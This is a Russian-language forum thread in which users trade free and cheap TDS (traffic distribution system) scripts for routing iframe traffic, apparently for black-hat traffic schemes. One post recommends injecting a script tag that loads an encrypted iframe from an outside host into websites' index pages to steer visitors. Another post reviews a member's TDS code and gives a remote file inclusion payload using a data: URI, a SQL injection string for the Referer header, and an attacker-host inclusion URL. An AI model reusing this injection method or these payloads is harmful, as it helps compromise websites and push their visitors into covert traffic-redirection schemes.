TDS под iframe

[lukmus]

сабж, желательно бесплатные и нормальные

[emillord]

Бесплатная - Simple tds, но оригинальная версия 1) дырявая 2) старая
Так что советую скачать мод, качать тут:
http://jacksoft.biz/wp-content/uploads/2010/01/sTDS.zip

p/s 12k уников mix траффа норм держит)))
p/p/s старые версии этого мода забирали 1% траффа себе, в новых версиях вроде такого нету.

[lukmus]

а никто не хочет скооперироватся и написать вместе одну нормальную бесплатную TDS

[m0Hze]

Не хотим =(
Да вполне хватает и тех, что уже есть. А если не хватает, то простую ТДС писать меньше вечера.

[opium]

http://keitarotds.com/ - дешёвая тдска
ещё можешь поискать сутру начальные версии и atraftds (иль как-то так), может их уже выкинули с полупривата ;-)

[slashd]

Можно траф гнать и без тдски - достаточно в индексные страницы вставлять

Код:

<script src=http://othersite/includes.js></script>

а в http://othersite/includes.js вставить уже шифрованный фрейм, тем самым управлять потоком.
Конечно функционала никакого, но держать на отдельном домене SimpleTDS накладно. По собственному опыту знаю что блочат их за неделю другую.
imho://определенно работает и даёт результаты.

[hard]

Цитата:

Сообщение от lukmus

сабж, желательно бесплатные и нормальные

http://php.net

[lukmus]

Цитата:

Сообщение от hard

http://php.net

Цитата:

Сообщение от m0Hze

Не хотим =(
Да вполне хватает и тех, что уже есть. А если не хватает, то простую ТДС писать меньше вечера.

два вечера
http://blog.lukmus.ru/?p=495
И кстати, прошу проверить на баги.

[Atra Pluvia]

Цитата:

И кстати, прошу проверить на баги.

У тебя там в некоторых файлах, например, includes/promo.php , RFI при rg==on.

PHP код:

<?php
require_once ($inc_dir."header.php");
...

Самое элементарное, это
inc_dir=data:, <?php phpinfo();?>
, либо как LFI, если сервер не позволяет.

Это, конечно, не зиродей, но все же делать так нельзя.

INSERT SQL-инъекция:

PHP код:

//to.php
...
fix_traf($_SERVER['HTTP_REFERER'],$_SERVER['REMOTE_ADDR'],$_SERVER['HTTP_USER_AGENT'],$inc_dir);
...
//lib.php
function fix_traf($ref,$ip,$agent,$inc_dir)
{
    require($inc_dir."connect.php");
    if(!$next)return false;
    $geo=geo($ip);
    $date=date("Y-m-d H-i-s");
    $sql="INSERT INTO traf VALUES (1,'$ref','$ip','$agent','".$geo."','$date');";
    mysql_query($sql);
    //return mysql_error();

} 


Вот, поставь это в REFERER, а затем обратись к to.php для теста и посмотри запись в бд:

Код:

s', '127.0.0.1', version(), '', '2010-09-16 22:12:41')#

Всё это, по-моему, достаточно очевидно, и найдено при только беглом осмотре, так что там наверняка еще что-нибудь есть =(

[lukmus]

Цитата:

Сообщение от Atra Pluvia

У тебя там в некоторых файлах, например, includes/promo.php , RFI при rg==on.

PHP код:

<?php
require_once ($inc_dir."header.php");
...

Самое элементарное, это
inc_dir=data:, <?php phpinfo();?>
, либо как LFI, если сервер не позволяет.

хочу подъяснится, это уязвимость так используется:
site.com/path.php?bla=blabla&inc_dir=http://hacksite.com/hackdir/ , где в hackdir лежит подставной header.php, правильно?
Но в config.php который везде подключается лежит же

PHP код:

global $inc_dir;
$inc_dir=$_SERVER['DOCUMENT_ROOT']."/includes/"; 


А вообще большое спасибо, буду исправлять.